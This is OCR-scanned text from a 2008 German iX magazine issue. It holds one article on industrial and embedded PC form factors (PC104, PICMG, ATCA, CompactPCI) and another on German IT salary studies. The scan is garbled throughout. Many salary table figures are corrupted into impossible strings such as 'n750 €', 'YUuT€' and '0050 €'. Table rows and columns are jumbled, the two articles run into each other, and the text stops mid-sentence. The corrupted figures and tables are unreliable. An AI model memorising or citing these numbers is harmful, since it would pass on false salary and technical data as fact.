Markt. 

Der Sicherheit dient ein integrierter 
Watchdog. Im Kern besteht ein solcher 
Wachhund aus einem Zähler, der, ein- 
mal angestoßen, rückwärts läuft. Er- 
reicht er die Null, löst er einen NMI 
(nicht-maskierbaren Interrupt) aus und 
startet den Rechner neu. Die zu über- 
wachende Software setzt im normalen 
Betrieb den Zähler regelmäßig vor dem 
Ablauf wieder auf den Anfangswert. 
Stürzt sie ab, springt der Zähler nicht 
zurück, der Watchdog schlägt zu und 
startet den Rechner neu. 

Es gibt nur wenig Einschränkungen 
bei der Auswahl des Betriebssystems. 
Sofern Treiber für die Komponenten 
vorhanden sind, geht alles von DOS bis 
zu Windows Server über Linux, BSD 
oder Solaris bis hin zu Echtzeitbetriebs- 
systemen. Die Chiphersteller setzen auf 
eine kleine Auswahl qualifizierter 
Chipsets und CPUs. Es gibt wenig 
Neuentwicklungen, sondern in der Re- 
gel Anpassungen. Gleiches gilt für die 
speziellen CPUs. Im Vordergrund steht 
ein niedriger Energieverbrauch, denn in 
Industrieanlagen ist es schwierig, für 
Kühlung zu sorgen. Ein sparsamer lüf- 
terloser PC passt gut in ein rundum ge- 
schlossenes Gehäuse, das gegen Staub 
und Nässe geschützt ist. 


Kleiner geht doch 


Ein gutes Beispiel für die Miniaturi- 
sierung von IPCs ist der Mops PM 
von Kontron. Auf nur 90 x 96 mm? 
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befindet sich ein kompletter Pentium- 
M-Rechner mit bis zu 1,4 GHz [a]. 
Neben einer parallelen, zwei seriellen 
Schnittstellen, zwei für USB 2.0, je ei- 
ner für EIDE und CF sowie einer 
LAN- und VGA-Schnittstelle existiert 
noch eine weitere für LVDS-Grafik. 
Das Modul ist über einen PC 104Plus- 
Bus [b] erweiterbar. Dahinter verbirgt 
sich der alte ISA-Bus, der auf zwei 
zweireihige Pfostenreihen gelegt ist. 
Der lange zweimal 32-polige Pfosten- 
verbinder ist an den 8-Bit-Teil des ISA 
Busses gekoppelt, der kurze, zweimal 
20-polige an die 16-Bit-Erweiterung. 
Sowohl Platinengröße als auch Lage 
der Stecker sind spezifiziert. Da noch 
ein PCI-Bus hinzukommt, nennt sich 
das Ganze PC104Plus. Er endet in ei- 
nem vierreihigen, 120-poligen Steck- 
platz. Die passenden Module kann man 
einfach ineinanderstecken und stapeln. 
Auf der Unterseite der Platine ragen die 
Stiftleiten heraus, oben befinden sich 
die passenden Buchsen. 

115 x 165 mm? belegt ein Single 
Board Computer (SBC) im EPIC-For- 
mat (Embedded Platform for Industrial 
Computing) an Fläche und mit 
146 x 203 mm? schlägt das EBX-For- 
mat (Embedded Board eXpandable) zu 
Buche. Da ein EPIC-Board nicht viel 
größer als ein Stück Kuchen ist, tau- 
chen die SBCs bis zu dieser Größe un- 
ter der Rubrik „Biscuit-PC“ im Handel 
auf. Als Nächstes wollen die Entwick- 
ler zusätzlich PCI-Express integrieren, 
was zu der Bezeichnung PC104-Ex- 
press führen wird. Geplant sind ein 
4x- und ein 16x-PCle-Anschluss auf 
dem kleinen Format von 90 x 96 mm?. 
Module für das Format sind derzeit 
auf dem Markt rar. 


Verwandtschaft zum 
Normal-PC 


Bei den ATX-, microATX- und ITX- 
Mainboards ist die Nähe zu den bei 
PCs üblichen Boards unverkennbar. 
Bei IPCs sind die Chipsets in erster Li- 
nie für Strom sparende CPUs ausge- 
legt. Viele der Boards erlauben den 
Anschluss von LDVS-Panels oder die 
Verwendung von CF-Karten. Für man- 
chen Einsatz eignen sich vor allem die 
P4-Boards mit ISA-Steckplätzen, denn 
häufig sind Steuer- und Messkarten, die 
diesen Bus nutzen, hochpreisig oder nur 
schwer zu ersetzen. Außerdem können 
Ingenieure Eigenentwicklungen auf der 
Basis von ISA recht einfach realisieren. 
Eine wichtige Gruppe von IPCs bilden 
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MOPSig: Auf dem 
kleinen Komplett- 
rechner im PC104- 
Format verbergen 
sich die Anschlüsse 
für PCI, USB und CRT 
in der weißen 
Steckleiste. Vorne 
sind die ISA- 
Steckplätze zu 
erkennen, der 
Hauptspeicher sitzt 
auf der Unterseite 
(Abb. 1). 


II 


Quelle: www.hs-augsburg.de 


die Systeme mit eigener Backplane, die 
alle Komponenten miteinander verbin- 
det. Der eigentliche Rechner besteht 
aus einer Einsteckkarte, was die War- 
tung der Systeme vereinfacht. Ordnung 
in die Anschlüsse bringt die Eintei- 
lung nach PICMG-Spezifikationen der 
PCI Industrial Computer Manufactu- 
rers Group [c], die circa 450 Mitglie- 
der hat. 

Die jüngste der PICMG-Spezifika- 
tionen trägt die Nummer 3, besser be- 
kannt als Advanced Telecommunica- 
tions Computing Architecture oder 
AdvancedTCA (ATCA) [e]. Die Spe- 
zifikation entstand ursprünglich für 
Telekommunikationsanwendungen. 

Die 19-Zoll-Racks müssen nur 
60 cm tief sein, die senkrecht eingebau- 
te Platine ist 8 Baueinheiten hoch und 
280 mm tief. Vorne sind die Anschlüs- 
se für optische, hinten die für Kupfer- 
kabel. Weder Hotplugging noch die 
Begrenzung der Leistungsaufnahme 


Doppeleuro: Rechts 
das cPCI-Mainboard 
mit Speicher und 
CPUs, links die I/O- 
Steckkarte, die 
entweder direkt oder 
auf die Backplane 
aufgesteckt wird 
(Abb. 2). 


auf 200W je Board hat die PICMG 
vergessen. ATAC beschränkt sich 
nicht auf x86-Server, es gibt Boards 
mit Signalprozessoren und PowerPCs 
oder Suns Sparcs [f]. Sechs Unterspe- 
zifikationen definieren Ethernet, Infini- 
band, StarFabric, PCI-Express, Rapid- 
IO und PRS. 

Bei PRS handelt es sich um Packet 
Routing Switches, RapidIO bezeichnet 
ein paketorientiertes, bis zu 60 GBit/s 
schnelles, geschaltetes (über Switch ge- 
koppeltes) Verbindungsverfahren, das 
vom Durchsatz her zwischen PCI-Ex- 
press und Ethernet liegt. StarFabric er- 
laubt es, PCI-Systeme zu erweitern und 
definiert Methoden, diese zu verbinden. 
Beim Aufbau von Clustern kann man 
StarFabric durchaus in Erwägung zie- 
hen. Für einige Anwendungen war 
ATCA zu groß, deshalb entstand zu- 
sätzlich microTCA mit 3 bis 6 U (Bau- 
einheiten im Rack) Höhe und 181 mm 
Tiefe der Platine. Diese Entwicklung 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


REPORT 


Embedded Computing 


ist recht originell, da einer der Haupt- 
gründe für die Schaffung des Stan- 
dards war, dass CompactPCI-Platinen 
für ATCA zu klein sind. 

Die Spezifikation für CompactPCI 
(cPCI) findet sich unter PICMG 2.xx 
wieder. Dessen Platinengröße ist auf das 
Eurokartenformat (100 x 160 mm?) 
oder Doppeleurokartenformat (233 x 
160 mm?) beschränkt. Es sind acht 
Karteneinschübe vorgesehen. cPCI- 
Rechner findet man häufig in der 
Mess- und Regeltechnik. Die Zahl von 
20 Unterspezifikationen zeigt, wie 
weit das Einsatzgebiet ist. Von beson- 
derer Bedeutung sind die Hotswap- 
Technik und die Redundanz der Sys- 
temslots, weil das die Möglichkeit 
eröffnet, das CPU-Board im laufenden 
Betrieb zu tauschen. Die Nutzung des 
cPCI-Formate beschränkt sich eben- 
falls nicht auf x86-Rechner. 

PICMG 1.x betrifft nur x86-IPCs. 
Auf der Backplane befinden sich nor- 
male Steckplätze zur Erweiterung. Je 


Senkrechtstarter: 
Das ATCA-Board 
steckt senkrecht im 
8 U hohen Gehäuse, 
hier eine Multipro- 
zessor-Blade, die 
Anschlüsse an die 
Backplane sind 
oben im Bild zu 
erkennen (Abb. 3). 


Quelle: www.powerbridge.de 


nach Bauform passen ISA-, PCI-, 
PCI-X- oder PCI-Express-Karten. Der 
eigentliche Rechner sitzt auf einer 
Slotkarte, die einer vollformatigen 
PCI-Karte entspricht. Im Grundstan- 
dard von PICMG 1.0 ist mindestens 
ein Steckplatz dafür vorgesehen. Es 
sind bis zu vier 32-Bit-PCI-Steckplät- 
ze definiert, die der Hersteller um wei- 
tere für ISA ergänzen kann. Über ins- 
gesamt 20 Slots verfügen die größten 
Backplanes, wobei zwei für die CPU- 
Karte vorgesehen sind. Maximal stehen 
also bis zu 14 ISA-Slots zur Verfügung, 
was dazu führt, dass die CPU-Karten 
immer noch Treiber für den ISA-Bus 
enthalten. 


Alter Bus in voller Fahrt 


Aber ISA gehört nicht mehr zu den 
aktuellen Bussen. Daher enthält die 
Definition 1.1 PCI-PCI-Bridges, um 
die Zahl der PCI-Steckplätze zu erhö- 


[a] Pentium-M-Board 


de.kontron.com/products/boardstand+mezzanines/pc104+sbctand#peri- 


pherals/mops+pc 104+cpu+modules/mopspm.html 


[bl PC104-Norm 
[ce] PICMG-Definitionen 
[d] Industrie-Boards 


www.pc104.org 
www.picmg.org 


www.amc-systeme.de/de/produkte/industrie_computer___systeme_u__ 


komponenten/de/produkte/industrie_computer___systeme_u__ 
komponenten/ipc_prozessorkarten_u_zubehoer/industrial_motherboards.html 


[e] ATCA-Norm 
[f} ATCA-Produkte 
[g] ATCA und Telko 


www.intel.com/technology/atca 
www.sun.com/products-n-solutions/hw/networking/atca/index.jsp 
www.itwissen.info/definition/lexikon/AdvancedTCA-ATCA- 


advanced-telecom-computing-architecture.html 


[h] StarFabric www.starfabric.org 
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hen, allerdings auf Kosten der passi- 
ven Backplane. Beliebt als PCI-PCI- 
Bridge sind Intels 21152-Chips, die 
man oft auf Mehrfachnetzwerkkarten 
findet. Der Chip macht aus einem 
PCI-Steckplatz vier. Es sind durchaus 
Backplanes mit 12 solcher Slots er- 
hältlich. Geht es um PCI-X, kommt 
die 64-Bit-Version der PICMG infra- 
ge. Zwar ist PICMG 1.2 moderner, 
dort fehlen aber die ISA-Slots. Soll 
PCI-Express hinzukommen, empfiehlt 
es sich, auf den Standard PICMG 1.3 
zu setzen. 


Zwei Bussysteme 
im engen Verbund 


Wenn die PICMG-Slot-Karten für die 
CPU zu groß sind, bietet sich PCISA 
an. Die Bezeichnung ist eine Zu- 
sammensetzung aus PCI und ISA. 
Gegenüber PICMG-1.x- sind PCISA- 
CPU-Slotkarten nur halb so lang. 
Beim Stecker stand der für EISA Pa- 
te, allerdings mit neuer Belegung. Wie 
dort ist aber der obere Teil für den 
ISA-Bus reserviert, PCI liegt auf der 
Verlängerung. Für EISA eignen sich 
die Karten nicht. 

Die Auswahl an Gehäusen und 
Backplanes für PICMG ist groß. Sie 
reicht im 19-Zoll-Bereich von 1 bis 
6 U. Es gibt einen Erweiterungsplatz 
für bis zu 19 verfügbaren Slots. Ge- 
häuse zur Wandmontage oder aus 
Edelstahl sind ebenfalls erhältlich. 
Wie bei den PCI-Karten kann man bei 
den Netzteilen auf handelsübliche Wa- 
re im AT/ATX-Format zurückgreifen. 
Als Alternative kommen nicht gekap- 
selte Open-Frame-Netzteile, redun- 
dante Lösungen oder eine Gleichspan- 
nungseinspeisung mit 12 oder 48 Volt 
infrage. 

Da bereits eine VoIP-TK-Anlage 
neue und hohe Anforderungen an die 
Verfügbarkeit stellt, lohnt es sich, In- 
dustrie-PCs in Erwägung zu ziehen. 
Dort finden sich Rechner mit ausrei- 
chender Anzahl von Steckplätzen, mit 
integrierter Watchdog-Überwachung, 
Gleichspannungsversorgung und pas- 
senden Edelstahlgehäusen mit Staub- 
filter. Nicht zu vergessen die Strom 
sparenden CPUs und die Liefergaran- 
tie für fünf Jahre. (rh) 


AXEL URBANSKI 


ist freier IT-Berater. 
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ie Gesamtbezüge von Vorständen 
D deutscher Unternehmen sind im 

Geschäftsjahr 2006/2007 durch- 
schnittlich um 17,5 % gestiegen. Zu 
diesem Schluss kommt die Gummers- 
bacher Unternehmensberatung Kien- 
baum in ihrem jüngst veröffentlichten 
Einkommensbericht. Um einer erupti- 
ven Neiddebatte vorzugreifen, sei an 
dieser Stelle noch schnell die differen- 
ziertere Bestandsaufnahme angeführt: 
Der deutliche Zuwachs ist in erster Li- 
nie auf die Erhöhung variabler erfolgs- 
abhängiger Vergütungsbestandteile zu- 
rückzuführen, die sich infolge der guten 
Konjunktur zwangsläufig für die Nutz- 
nießer erfreulich entwickelten. 

Konsequenterweise wurden anderer- 
seits die Vorstandsbezüge im Betrach- 
tungszeitraum bei einem Drittel der 
Firmen gekürzt, da die Geschäfte hier 
schlechter liefen. Der Studie zufolge 
weisen die Bezüge der Vorstandsmit- 
glieder deutscher Aktiengesellschaften 
zudem eine erhebliche Spanne in der 
Vergütung auf, die von 40 000 € bis 
hin zu mehr als sieben Millionen € im 
Jahr reicht. 

Nicht nur von der letztgenannten 
Summe dürfen IT-Profis nur träumen, 
dasselbe gilt für den zweistelligen Be- 
zugszuwachs. Denn die rund 43 000 
freien Stellen für IT-Spezialisten, die 
nach Bitkom-Angaben derzeit in 
Deutschland nach Besetzung verlangen, 
führten im Allgemeinen noch nicht zu 
überdurchschnittlichen Steigerungen. 
Die IG Metall kommt in ihrer jüngsten 
ITK-Entgeltanalyse sogar zu dem 
Schluss, dass sich die Gehälter in der 
Informations- und Telekommunika- 
tionsbranche im vergangenen Jahr in 
der Summe negativ entwickelten. 


Näher Hinschauen 
relativiert Wehklagen 


Die Ergebnisse der IG-Metall-Analyse 
klingen dramatischer, als sie bei einge- 
hender Betrachtung sind. Das liegt zum 
einen am Erhebungszeitpunkt. Die Da- 
ten beziehen sich auf das vierte Quar- 
tal 2006. Die deutliche Konjunkturver- 
besserung in 2007 konnte folglich noch 
keine Spuren hinterlassen. Zudem sind 
die einzelnen Werte traditionell auf ei- 
ne 35-Stunden-Woche normiert, in der 
Branche gelten jedoch unterschiedliche 
Wochenarbeitszeiten. 

Insbesondere in Vertriebsbereichen 
ermittelte die ITK-Entgeltanalyse 2008 
der IG Metall starke Einbußen. Dabei 
reduzierten sich die Bonuszahlungen mit 


iX 6/2008 


Studien zur Einkommensentwicklung 


Manchmal mehr 


Achim Born 


Der Trend aus dem vergangenen Jahr hat Bestand: 

Der Mangel an Fachkräften führt nicht automatisch zu 
überdurchschnittlichen Zuwächsen auf der Gehaltsseite. 
Beklagen müssen sich die IT-Profis übers Salär indes nicht. 
Und für das laufende Jahr erwarten die Gehaltsexperten 
noch einmal einen ordentlichen Zuschlag. 


bis zu 50 % stärker als die Fixgehälter. 
Auch in den Bereichen Beratung/Con- 
sulting und Servicetechnik sanken die 
Bruttogehälter um bis zu 13 %. In der 
Hardwareentwicklung waren sowohl die 
Gehälter als auch die Beschäftigtenzah- 
len rückläufig. Ebenfalls negativ zeig- 
te sich der Trend im Bereich Projekt- 
management. Positiv hingegen haben 
sich die Entgelte in den Callcentern ent- 
wickelt, wo besonders in der Einstiegs- 
stufe hohe Steigerungen von bis zu ei- 
nem Drittel zu verzeichnen sind. 


Einbußen bei den 
Hardwareentwicklern 


Sowohl für Anfänger als auch für er- 
fahrene Mitarbeiter im Bereich Hard- 
ware wird ein Rückgang von mehreren 
Tausend Euro beim Jahressalär auf- 
gewiesen. Nahm der „gewöhnliche“ 


Entwickler laut 2007er-Analyse noch 
durchschnittlich 53 742 € (Fixgehalt 
plus variable Bestandteile) mit nach 
Hause, betrug der gewichtete Mittel- 
wert heuer 39 200 €. Für den Junior- 
entwickler reduzierte sich das Einkom- 
men um circa 14 000 € auf 36 400 €, 
für den Seniorentwickler sogar um 
knapp 19 000 € auf 42 500 €. Freu- 
en durfte sich allein der Leiter in der 
Hardwareentwicklung, dessen Gehalt 
um 1200 € auf 87 500 € stieg. 

Ein Minus wiesen ebenso die Ein- 
kommen der Beschäftigten in Rechen- 
zentren auf. Sie muten im Vergleich zur 
Hardwareentwicklung allerdings weni- 
ger drastisch an. Das Gehalt der Opera- 
toren mit langjähriger Berufserfahrung 
hat sich danach um ein Zehntel auf 
44 800 Euro reduziert. Ein Rechenzen- 
trumsleiter (93 000 €) musste sich mit 
knapp 6000 € weniger begnügen. Deut- 
liche Rückgänge gab es ebenso bei den 
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REPORT 


IT-Gehälter 


oberes Quartil! 


y 


8-30 Jahre 


r 


| Saftwnreentwicder 2 


5070 € 
Softwareentwickler 35 Jahre 61 355 € 
Gruppenleiter 35 Jahre n750 € 
Abteilungsleiter 40 Jahre 9% 075 € 
(Führung einer Abteilung mit 
10 Mitarbeitern) 
Bereichsleiter 45 Jahre 138 125 € 


(Führung eines Bereiches mit 


53 000 € 


Softwareentwickler 35 Jahre 65 465 € 
Gruppenleiter 35 Jahre 153€ 
Abteilungsleiter 40 Jahre % 525 € 
(Führung einer Abteilung mit 

10 Mitarbeitern) 

Bereichsleiter 45 Jahre 124 320 € 


(Führung eines Bereiches mit 
50 Mitarbeitern in mehreren 
Abteilungen) 


Bı 
Softwareentwickler 28-30 Jahre 


58 500 € 
Softwareentwickler 35 Jahre 73 395 € 
Gruppenleiter 35 Jahre 79 166 € 
Abteilungsleiter 40 Jahre 101 900 € 
(Führung einer Abteilung mit 
10 Mitarbeitern) 
Bereichsleiter 45 Jahre (Führung 131150 € 


eines Bereiches mit 50 Mitarbeitern 
in mehreren Abteilungen) 


Gehältern der Anwendungsentwickler 
und leitenden Softwarespezialisten. Ers- 
tere erhielten nach IG-Metall-Berech- 
nung mit rund 37 000 € über 8000 € 
weniger. Bei den leitenden waren dies 
circa 4500 Euro. 

Doch auch in Gewerkschaftskreisen 
geht man davon aus, dass aufgrund der 
guten Geschäftslage 2007 und dem 
Mangel an Fachleuten die Gehaltskurve 
in den kommenden Jahren „deutlich 
nach oben zeigt“. Andererseits sind die 
Gehaltseinbußen zum Teil ein Beleg 
für die schwindende Bedeutung der 
Hardwarefertigung in Deutschland. 


Andere Analysten, 
andere Ergebnisse 


Gehaltsuntersuchungen von Kienbaum 
oder Personalmarkt haben im Unter- 
schied zur IG-Metall-Untersuchung die 
Steigerungen im vergangenen Jahr 
bereits eingerechnet. So berichtet Kien- 
baum in der branchenübergreifend ange- 
legten Vergütungsstudie 2007 (Erhe- 
bungsstichtag: 1. Februar 2007) von 
einem durchschnittlichen Plus von 3 % 
der Jahresgesamtbezüge von Führungs- 
und Fachkräften der Informationstech- 
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Median? unteres Quartil® 


4473] € 40 34 € 
52 500 € 406 € 
AETES 5317 € 
81 384 € 71950 € 
119.000 € 106 64 € 


41 355 € 2433 € 
56 559 € 50 344 € 
62 854 € 55 387 € 
82592 € 76. 675 € 
111.000 € 101 256 € 


51 900 € 46 688 € 
65 999 € 58 941 € 
71 240 € 63792 € 
91052 € 81 000 € 
116 230 € 100 322 € 


nik. Danach lag 2007 das Jahresge- 
samtgehalt von IT-Führungskräften, die 
disziplinarische Führungs- und Perso- 
nalverantwortung gegenüber Mitarbei- 
tern haben, im Schnitt bei 105 000 €. 
Eine Fachkraft erhielt 60 000 €. Die 
Angaben setzen sich dabei jeweils aus 
Jahresgrundgehalt und variablen Ver- 
gütungsbestandteilen zusammen. In die 
Zahlen nicht eingerechnet sind die 
geldwerten Vorteile von betrieblichen 
Zusatzleistungen sowie Überstunden- 
vergütungen. 

Wie bereits in den Vorjahren regis- 
trierte die Kienbaum-Untersuchung ei- 
nen Trend zur stärkeren Gewichtung der 
variablen Vergütungskomponenten. Das 


A-TRACT 


@ Die hohe Nachfrage nach IT- 
Fachkräften führte bislang noch 
nicht zu exorbitanten Gehalts- 
steigerungen. 


© Variable Einkommensbestandteile 
gewinnen an Einfluss. 


© Vor allem Projektleiter dürfen 
sich über gestiegene Einkommen 
freuen. 


& Co. KG. Veröffentlichung und Vervielfältigung nur] 


Quelle: Personalmarkt-Vergütungsstudie „IT-Funktionen”, 10/2007 


Gehalt von 78 % aller Führungskräfte 
und 55 % der Fachkräfte enthielt 2007 
einen variablen Bestandteil in Form von 
Prämien, Tantiemen, Boni oder sonsti- 
gen Sonderleistungen. Im Vorjahr be- 
trug die durchschnittlich ausgeschüttete 
Höhe 17 900 € für eine Führungskraft 
und 6800 € für eine Fachkraft. Neben 
dem Gehalt bilden betriebliche Zusatz- 
leistungen, etwa die betriebliche Alters- 
versorgung, Arbeitgeberdarlehen oder 
Ähnliches, einen gewichtigen Faktor des 
Vergütungssystems. Diese Leistungen 
entsprechen oft erheblichen finanziellen 
Äquivalenten, sie sollten deshalb beim 
Gehaltsvergleich einbezogen werden. 

Zweifelsfrei die höchsten Jahresge- 
samtbezüge erzielten nach der Gehalts- 
statistik von Kienbaum im vergangenen 
Jahr die Leiter Informationsverarbeitung 
und Organisation mit einer Spannweite 
von 98 000 € (unteres Quartil) und 
163 000 (oberes Quartil). Für den Leiter 
IT-Management lauten die Vergleichs- 
zahlen 97 000 und 134 000 Euro. Die 
Einkommensunterschiede für IT-Fach- 
kräfte fielen in der Relation ähnlich 
hoch aus. Im Bereich der Anwendungs- 
entwicklung lagen die Einkommen 
beispielsweise in der Bandbreite von 
46 000 € und 62 000 €. 

Zu den wichtigen Einflussfaktoren 
auf die Gehaltshöhe zählt der jeweilige 
Standort. Wie in der Vergangenheit er- 
gab sich, dass die Vergütung in den 
großstädtischen Ballungsräumen am 
höchsten ausfällt. Das 2007er-Niveau 
der Jahresgesamtbezüge von IT-Kräf- 
ten in den neuen Bundesländern belief 
sich im Durchschnitt auf knapp 80 % 
der in Deutschland gezahlten Gehälter. 
Ursache ist unter anderem die größere 
Konkurrenz der Unternehmen in Bal- 
lungsgebieten um einzelne Mitarbeiter. 
Auf der anderen Seite stellt das Mehr 
an Einkommen oftmals auch „nur“ ein 
Äquivalent für die höheren Lebenshal- 
tungskosten in den Zentren dar. 


Betriebsgröße beeinflusst 
Chef-Honorar 


Einen erheblichen Einfluss auf die Ver- 
gütungsstruktur (vgl. Tabelle: Alter und 
Firmenumsatz beeinflussen Jahresge- 
samtbezüge) üb(t)en neben positions- 
und personenspezifischen Aspekten 
unternehmensbezogene Faktoren aus. 
So steigt die Personalverantwortung 
tendenziell mit der Größe des Unter- 
nehmens und der Abteilung. Mehr 
Verantwortung ist indes in der Regel 
gleichbedeutend mit mehr Gehalt. Ein 
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Position bis 301. 30 35 4 45 über | bis15 1550 50bs 100bis 250bis 500bis über Durch- 

bis 35). bis40J. bis45J. bis50J. bis55J. 554. | Mio.Euro Mio. Euro 100Mio. 250 Mio. 500 Mio. 1000 Mio. 1000 Mio. schnitt 
Euro Euro Euro Euro Euro Euro 
Leiter IT Management - 76 93 9% 117 141 140 | 91 95 102 113 116 128 157 115 
Leiter Anwendungsentwicklung — - 84 100 105 101 109 | 78 94 103 100 102 104 110 102 
Leiter IT Betrieb - - 74 93 2 95 Now 79 80 80 9 104 107 93 
Leiter Netzwerktechnik/ TK - 8] 75 88 94 111 - 8 69 69 75 - 9 98 87 
Projektleiter 5] 69 n n 79 7 Era ui 70 n 73 - 75 80 73 
Datenbankdesigner 4 44 59 63 73 73 74 | 60 62 64 65 = 66 68 65 
Anwendungsentwickler 39 48 55 60 59 64 66 | 45 5] 49 5] by] 55 61 55 
Webredakteur - 4 53 52 55 70 78 | 9 50 4 - 57 61 65 58 
Systemprogrammierer 40 56 59 62 64 74 66 - 55 56 56 62 59 64 61 
Helpdesk-Spezialist 36 43 44 49 46 5] 5 134 44 46 47 46 5] 4 45 


Leiter des IT-Managements erhielt in ei- 
nem Betrieb mit bis zu 100 Mitarbeitern 
ein durchschnittliches Jahresgehalt von 
95.000 Euro. Auf der gleichen Position 
hätte er in einem Unternehmen mit 
über 5000 Mitarbeitern durchschnittlich 
169 000 Euro im Jahr verdient. Arbeitet 
er in einem kleineren Betrieb mit einem 
Jahresumsatz von bis zu 15 Mio. €, 
wurde er mit 91 000 € entlohnt. Die Ge- 
samtjahresbezüge von Leitern des IT- 
Managements in Großunternehmen 
(über 1 Mrd. Euro Jahresumsatz) be- 
liefen sich dagegen auf 157 000 €. 
Im Falle der IT-Fachkräfte waren 
die Gehaltsunterschiede bei identischer 


Position nicht ganz so dramatisch. 
Hier zählte eher die Berufserfahrung — 
und damit indirekt auch das Lebensal- 
ter. Es gilt nach wie vor die Daumen- 
regel, dass das Einkommen mit dem 
Alter steigt. Ein Anwendungsentwick- 
ler jenseits der 55 durfte sich der Kien- 
baum-Untersuchung zufolge schon ein- 
mal über 66 000 Euro Gehalt freuen, 
während sein junger Kollege (unter 30 
Jahre) sich mit 39 000 € begnügen 
musste. 

Zu beachten ist laut Studienautoren 
allerdings, dass zum Stichtag der Unter- 
suchung die seinerzeit noch „maue“, 
konjunkturelle Lage für stagnierende 


Quelle: Vergütungsstudie 2007, Kienbaum 


oder zum Teil rückläufige Durch- 
schnittsgehälter in der Altersklasse 
„bis 30 Jahre‘ sowie in der Firmen- 
beziehungsweise Positionszugehörig- 
keit führte. Angesichts der verbesser- 
ten wirtschaftlichen Gesamtsituation 
darf man in diesem Punkt eine arbeit- 
nehmerfreundlichere Entwicklung er- 
warten. Zumindest geht Kienbaum im 
Vorfeld der Neuauflage der Untersu- 
chung allgemein von einem verbesser- 
ten Gehaltsplus aus. Dies soll in 
Unternehmen, die die Gehaltsrunde 
am 1. Februar bereits hinter sich hat- 
ten, bei 3,5 % liegen. Mitarbeiter von 
Firmen, in denen die Erhöhung noch 
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REPORT 


IT-Gehälter 


im Laufe des Jahres erfolgt, sollen sich 
sogar auf ein Plus von 3,8 % freuen 
dürfen. 


Ausgleich 
für müdes Vorjahr 


Die Hamburger Vergütungsberatung 
Personalmarkt veranschlagt in einer ge- 
meinsam mit der Computerwoche durch- 
geführten Auswertung das Plus sogar 
noch ein wenig höher. In der Ende Fe- 
bruar veröffentlichten Untersuchung 
wird branchenübergreifend für das lau- 
fende Jahr von einer 4%igen Gehalts- 
steigerung für IT-Chefs ausgegangen. 
Dieser Zuwachs nimmt sich noch be- 
scheiden aus, da die Berufsgruppe der 
Projektleiter ein doppelt so hohes Plus 


erzielen soll. Als Erklärung für diesen 
Gehaltssprung führt Personalmarkt die 
Stagnation aus dem Vorjahr an, die nun 
ein wenig ausgeglichen werde. 

Konkret hat sich das Bruttogehalt der 
Projektleiter mit Personalverantwortung 
um knapp 7000 € auf 88000 € erhöht. 
Fehlt die disziplinarische Zuständigkeit, 
ist noch immer ein Plus von 5000 € auf 
65 000 € zu verzeichnen. 

Die Personalmarkt-Statistik deckt 
zudem einen erheblichen Einfluss der 
Branche auf die positionsbezogenen 
Einkommen auf (siehe auch Tabelle 
„Brutto-Jahresgehalt im Branchenver- 
gleich“). Wer in der Finanzbranche 
schafft, darf sich allgemein über das 
höchste Salär freuen. So nimmt ein 
dort beschäftigter Projektleiter durch- 
schnittlich 80 750 € mit nach Hause. 


nach Alter,/Funktionen oberes Quartil 
ohne Personalverantwortung 
Softwareentwickler 
25 Jahre 43 600 € 
30 Jahre 51 268 € 
35 Jahre lasse 
40 Jahre 62 160 € 
45 Jahre 64 700 € 
50 Jahre 67 850 € 
55 Jahre 71586 € 
25 Jahre 45 009 € 
30 Jahre 56.400 € 
35 Jahre 68. 651 € 
40 Jahre 73 560 € 
45 Jahre 81 970 € 
50 Jahre 83 900 € 
80 300 € 


55 Jahre 


ne 4737 € 


350 


30 Jahre 63 000 € 
35 Jahre 72.000 € 
40 Jahre 80 275 € 
45 Jahre 87 500 € 
50 Jahre 8509 € 
55 Jahre 0050 € 


Median unteres Quartil 
39 600 € 36 000 € 
47560 € 260 € 
5250 € 406€ 
5326 € 47260 € 
54100 € 48 288 € 
K2n€ 90€ 
5980 € 49 800 € 
2000 € 38.035 € 
870€ 4357 € 
YUuT€ 53.000 € 
64.000 € 64€ 
70 649 € 62073 € 
7200 € 61 000 € 
72000 € 65 26 € 


42.000 € 38 400 € 
54 000 € 47250 € 
63 950 € ALTES 
71 056 € 63 000 € 
76210 € 66 867 € 
75 282 € 66 249 € 
770 € 70200 € 


Funktion 2007 
Juniorberater 44 325 
Berater 53 957 
Seniorberater 64 899 
Chefberater 73 432 
Manager 83 384 
HRW-Juniorentwickler 36 400 
HRW-Entwickler 39 200 
HRW-Seniorentwickler 42 461 
Gruppenleiter Entwicklung Hardware 65 625 
Leiter Entwicklung Hardware 87 455 
Sfw-Entwickler-Junior 37 033 
Sfw-Entwickler 54 209 
Sfw-Entwickler-Senior 60 471 
Leiter Software Engineering 92 270 


2006 2005 
42 88] 45 833 
57 247 56 490 
69 109 74 470 
88 039 108 200 
98 640 110 812 
50 234 41 867 
53 742 47714 
61 113 56 851 
74 619 71 138 
86 139 74.077 
45 183 4392 
55 208 57 887 
66 417 65 074 

100 752 82 969 


Quelle: Personalmarkt-Vergütungsstudie „IT-Funktionen“, 10/2007 


Quelle: IG Metall, 03/2008 


Die Kollegen in der Telekommunika- 
tionsindustrie kommen hingegen auf 
73 326 €. In der Automobilbranche 
werden 70 357 € verdient. Projektlei- 
ter von System- und Softwarehäusern 
erhalten 65 394 € beziehungsweise 
59 758 €. Ein IT-Bereichsleiter in der 
Finanzwirtschaft erhält durchschnitt- 
lich 165 000 € im Jahr, während in 
den System- und Softwarehäusern die 
Bereichsleiter „nur“ 108 000 bezie- 
hungsweise 105 000 € verdienen. Zu 
beachten ist allerdings, dass die „sof- 
te“ IT-Branche eher mittelständisch 
geprägt ist. Folglich fällt das Gehalt 
auch aufgrund der Firmengröße gerin- 
ger aus. 

Die Hamburger Vergütungsberatung 
dokumentiert in einer eigens für diese 
Zeitschrift durchgeführten Auswertung 
auf Basis von knapp 9000 Datensätzen 
zudem die enge Korrelation von Gehalt 
und Alter (vergl. Tabelle „Alter zahlt 
sich aus“). Das Einkommen eines 25- 
jährigen Projektleiters liegt demnach 
zwischen 38 400 € (unteres Quartil) 
und 49 737 € (oberes Quartil). Bei den 
35-Jährigen lauten die Vergleichswerte 
57047 € und 72 000 €, bei den 55- 
Jährigen 70 200 € und 90 050 €. 

Unter dem Strich belegen die zitier- 
ten Gehaltsstatistiken die vielfältigen 
Einflussgrößen, die auf eine Gehalts- 
gestaltung wirken. Neben unterneh- 
mensbezogenen Faktoren wie Größe, 
Umsatz oder Branche, positionsspezi- 
fischen Aspekten und eigener Berufs- 
erfahrung sollten auch Markteinflüsse 
